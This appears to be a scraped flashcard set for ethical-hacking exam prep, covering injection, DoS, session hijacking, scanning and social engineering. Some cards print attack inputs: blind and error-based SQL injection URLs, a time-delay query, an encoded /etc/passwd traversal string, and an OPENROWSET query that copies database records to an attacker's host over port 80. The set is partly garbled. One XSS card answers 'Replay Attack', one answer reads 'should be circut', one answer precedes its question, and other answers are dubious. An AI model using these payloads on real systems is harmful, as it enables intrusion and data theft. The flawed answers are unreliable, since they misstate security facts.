Exam

Ace your homework & exams now with Quizwiz!

What is the common lower threshold for a Pulse Wave attack?

300Gbps

A tester is attempting a CSPP attack. Which of the following is she most likely to use in conjunction with the attack?

;

What is the integrity check mechanism for WPA2?

CBC-MAC

In nmap, the http-methods script can be used to test for potentially risky HTTP options supported by a target. Which of the following methods would be considered risky per the script?

CONNECT

What kind of Injection Attack relies on new line characters (\r OR \n) for tricking a target server?

CRLF Injection

Which of the following techniques is considered human-based social engineering?

Diversion theft

An attacker successfully configured and set up a rogue wireless AP inside his target. As individuals connected to various areas, he performed a MITM attack and injected a malicious applet in some of the HTTP connections. This rerouted user requests for certain pages to pages controlled by the attacker. Which of the following tools was most likely used by the attacker to inject the HTML code?

Ettercap

What aspect of a Fragmentation Attack causes a target system to crash?

Exhaustion of resources

What kind of testing to detect SQL injection deals with direct parameter testing in a URL or similar, and is a black-box methodology?

Function Testing

HTML forms include several methods for transferring data back and forth. Inside a form, which of the following encodes the input into the Uniform Resource Identifier (URI)?

GET

Which of the following prevention methods prevents source address spoofing, and protects against flooding attacks originating from valid prefixes?

Ingress filtering

What kind of packets initiate a Smurf Attack?

ICMP echo

In nmap/Zenmap, what does the -sO flag indicate?

IP protocol scan

What kind of command injection, often used for defacement, is defined as adding input to a web script that is then used in the output HTML without being checked for code or scripting?

HTML Embedding

In one of the following social engineering techniques, an attacker assumes the role of a knowledgeable professional so that the organization's employees ask them for information. The attacker then manipulates questions to draw out the required information. Which is this technique?

Reverse social engineering

Which of the tools listed here is a passive discovery tool?

Kismet

Which of the following is not a common language for execution of XSS attacks?

Ruby

Which of the following is NOT an HTTP Header-based Injection technique? S-MIME X Forwarded-For Referer User-Agent

S-MIME

What kind of statement is traditionally the target injection point for SQLi, specifically in a WHERE section of this kind of clause?

SELECT

What kind of attack enables injection of client-side scripts to manipulate web pages viewed by other users?

Replay Attack

During which phase of a security/penetration test would a non-disclosure agreement (NDA) be executed?

Pre-Attack

Regarding SSIDs, which of the following are true statements? (Choose all that apply.)

SSIDs are part of every packet header from the AP. SSIDs can be up to 32 characters in length.

Which of the following statements is true about Secure Sockets Layer (SSL)?

SSL operates above the transport layer

Which of the following is not representative of a Volumetric DoS Attack?

SYN Flood

Which of the following does not use ICMP in the attack? (Choose two.)

SYN flood Peer to peer

Which of the following is a meta-search engine?

Startpage

In one of the following types of identity theft, the perpetrator obtains information from different victims to create a new identity by stealing a social security number and uses it with a combination of fake names, date of birth, address, and other details required for creating a new identity. Which is this type of identity theft?

Synthetic identity theft

What is the purpose of the Recon-Dog utility?

System information harvesting via API calls

In which of the following attack types does an attacker exploit vulnerabilities that evolve from the unsafe use of functions in an application in public web servers to send crafted requests to internal or backend servers?

Server-side request forgery

Which of the following attacks an already-authenticated connection?

Session hijacking

Which of the following prevention methods prevents DoS by intercepting and validating TCP connection requests?

TCP intercept

Which of the following attack types occurs at the OSI Layer 4 (Transport)?

TCP session hijack

While researching specific security issues, you decide to implement an anonymizer. Which of the following would not be a suitable tool?

Tails

Which of the following attack types occurs at the OSI Layer 5 (Session)?

Telnet-based DoS

Which of the following is used by SOAP services to format information?

XML

What kind of attack enables injection of client-side scripts to manipulate web pages viewed by other users?

XSS Attack

An attacker is looking at a target website and is viewing an account via URL http://www.anybiz.com/store.php?id=2. He next enters the following URL: http://www.anybiz.com/store.php?id=2 and 1=1. The web page loads normally. He then enters the following URL: http://www.anybiz.com/store.php?id=2 and 1=2. A generic page noting "An error has occurred" appears. Which of the following is a correct statement concerning these actions?

The site is vulnerable to blind SQL injection.

Which of the following is an evasion technique that involves replacing characters with their ASCII codes in hexadecimal form and prefixing each code point with the percent sign (%)?

URL encoding

What kind of information is unlikely to be gleaned from a geographical search engine (Google Earth, Wikimapia)?

Underground tunnels

Where is the primary flaw, which allows SQLi to occur, located?

Web application

Semicolon

What kind of character is used to terminate a SQL statement?

What kind of character is used to represent the end of a line in a Mac system?

\r

You are configuring rules for your Snort installation and want to have an alert message of "Attempted FTP" on any FTP packet coming from an outside address intended for one of your internal hosts. Which of the following rules are correct for this situation?

alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"Attempted FTP")

In what situation would you employ a proxy server? (Choose the best answer.)

You want to filter Internet traffic for internal systems.

Given below are the steps involved in automated patch management: a=Test, b=Assess, c=Detect, d=Acquire, e=Maintain, f=Deploy. What is the correct sequence of steps involved in automatic patch management?

c → b → d → a → f → e

Which of the following firewalls is specifically implemented at OSI Layer 5 (Session)?

should be circut

In which of the following security risks does an API accidentally expose internal variables or objects because of improper binding and filtering based on a whitelist, allowing attackers with unauthorized access to modify object properties?

Mass assignment

Which of the following phishing techniques focuses on flooding spam across a network?

Spimming

You are examining log files and come across this URL: http://www.example.com/script.ext?template%2e%2e%2e%2e%2e%2f%2e%2f%65%74%63%2f%70%61%73%73%77%64. Which of the following best describes this potential attack?

An attacker appears to be using Unicode.

What is the purpose of the BillCipher utility?

Collecting information about a website or address

What kind of attack allows attackers to exploit vulnerable scripts on a server to use remote files rather than a trusted local file?

File Injection

Which of the following prevention methods controls the speed of outbound or inbound traffic of a network controller and can reduce the high-volume traffic caused by DDoS?

Rate limiting

How would you filter FTP control traffic on IP Address 10.0.0.10 in Wireshark?

ip.addr==10.0.0.10 && tcp.port=21

FTP

21

An attacker is viewing a blog entry showing a news story and asking for comments. In the comment field, the attacker enters the following: Nice post and a fun read... What is the attacker attempting to perform?

A cross-site scripting attack

Which of the following is NOT a component of Web Application Hacking Methodology?

Attack Network Infrastructure

Which of the following best describes a teardrop attack?

Attacker sends several overlapping, extremely large IP fragments.

Which of the following encoding schemes represents any binary data using only printable ASCII characters and is used for encoding email attachments for safe transmission over SMTP?

Base64 encoding

In which of the following types of hijacking can an attacker inject malicious data or commands into intercepted communications in a TCP session, even if the victim disables source routing?

Blind hijacking

What kind of SQL injection deals with conjoining a known valid statement with a target parameter to test the success of an injection?

Boolean Exploitation SQLi

The source code of software used by your client seems to have a large number of gets() alongside sparsely used fgets(). What kind of attack is this software potentially susceptible to?

Buffer overflow

An attacker tricks a user into visiting a malicious website via a phishing e-mail. The user clicks the email link and visits the malicious website while maintaining an active, authenticated session with his bank. The attacker, through the malicious website, then instructs the user's web browser to send requests to the bank website. Which of the following best describes this attack?

CSRF

Your company needs to implement a firewall. This device must be able to discard TCP segments based on parameters such as IP address, port, and protocol used. What kind of firewall would work here?

Circuit level firewall

Which feature of IPSec provides the ability to prevent a message from being read unless the appropriate decryption is used?

Confidentiality

Which of the following techniques is also called a one-click attack or session riding and is used by an attacker to exploit a victim's active session with a trusted site to perform malicious activities?

Cross-site request forgery attack

What kind of vulnerability allows the CRIME session hijack to work?

Data compression in SSL/TLS protocol

What kind of web-based timing attack is carried out by measuring the approximate time taken by a server to process a POST request?

Direct Timing

Which of the following is NOT an objective of scanning

Discover services supported by infrastructure devices

What causes an IPID number to be incremented?

Each packet sent by the host machine

Which of the following prevention methods scans the headers of IP packets leaving a network and ensures that unauthorized or malicious traffic never leaves the internal network?

Egress filtering

The following injection query is inputted to extract a database's name: http://www.certifiedhacker.com/page.aspx?id=1 or 1=convert(int, (DB_NAME))—. The following text is returned: Syntax error converting the nvarchar value '[DB_NAME]' to a column of data type int. What kind of injection has been performed?

Error based injection

What is the purpose of the FOCA utility?

Extracting metadata from document scans

Which of the following is not representative of an Application Layer DoS Attack?

HTTP PUT

While on vacation, Joe receives a phone call from his identity alert service notifying him that two of his accounts have been accessed in the past hour. Earlier in the day, he did connect a laptop to a wireless hotspot at McDonald's and accessed the two accounts in question. Which of the following is the most likely attack used against Joe?

Honeyspot access point

What kind of information is this following query attempting to extract: http://www.certifiedhacker.com/page.aspx?id=1; IF (ASCII(lower(substring((USER), 3,1)))=97) WAITFOR DELAY '00:00:10'—

If the first character in the username contains the letter "a"

Which of the following is a recommendation to protect against session hijacking? (Choose two.)

Implement IPSec throughout the environment. Use unpredictable sequence numbers.

Name the service, based on these attributes: Hierarchical, client-server based, allows directory searches via filters, organizes info by its attributes, often injected into via use of stacked parentheses

LDAP

SMTP Enumeration relies on three built-in commands. Which of the following options is NOT one of those three?

LIST

Which of the following attacks runs malicious code inside a browser and causes an infection that persists even after closing or browsing away from the malicious web page that spread the infection?

MarioNet attack

Which of the following is not an enumeration target for a MySQL database?

Mysql.schema

Which of the following tools is designed for automatic scanning of IPV4/V6 addresses, hostnames, domain names, and URLs?

NetScanTools Pro

Which of the following is not considered a strong tool for port scanning? Netcraft NetScanTools Pro Sandcat Browser Nmap

Netcraft

In nmap/Zenmap, what does the -sn flag indicate?

No Port Scan

What SQL function can be used to link a target database to an attacker's database for replication over port 80? EX: '; insert into _____??_____ ('SQLoledb', 'uid=sa; pwd=pass; Network=MAIN; Address=myIP,80;', 'select * from mydatabase..hacked_sysdatabases') select * sys.sysdatabases

OPENROWSET

Which protocol would work best to encrypt a VPN connection at OSI Layer 2 (Data Link)?

PPTP

Which of these attacks is considered a Presentation Layer (L7) vulnerability?

Parameter tampering

Which of the following phishing techniques is also referred to as "phishing without a lure"?

Pharming

Which of the following DoS attacks inflicts permanent damage on hardware, often causing a "bricked" system?

Phlashing

Which of the following is not representative of a Protocol DoS Attack?

Slowloris Attack

theHarvester is an automated tool that can collect public emails for what purpose?

Social engineering

What kind of testing involves applications like Parasoft Jtest, RIPS, CAST AIP, and Klocwork?

Source Code Review

An attacker performs a whois search against a target organization and discovers the technical point of contact (POC) and site ownership e-mail addresses. He then crafts an email to the owner from the technical POC, with instructions to click a link to see web statistics for the site. Instead, the link goes to a fake site where credentials are stolen. Which attack has taken place?

Spear phishing

An attack can be considered an equation: Attacks = Motive + Method + __________?

Vulnerability

Which of the following is the best choice in searching for and locating rogue access points?

WIPS

Which of the following use a 48-bit initialization vector? (Choose all that apply.)

WPA2 WPA

Which of the following statements is not true regarding WebGoat?

WebGoat can be installed on Windows systems only.

Which of the following tools is a good fit for identifying user input entry points in a page's HTML like User-Agent, Referer, Accept, Accept-Language, and Host-headers?

WebScarab

20. List the correct order of these session hijacking process components A: Command Injection, B: Monitor, C: Predict Session ID, D: Session Desynch, E: Sniff

a. E-B-D-C-A


Related study sets

RN Mental Health Online Practice 2023A

View Set

Survey of Entrepreneurship: Test 2

View Set

Med/Surg Prep U ch. 39, 40, 41, 42

View Set

Criminal Justice Today: Chapter 12

View Set

WWU MKTG 380 Midterm 1 Questions

View Set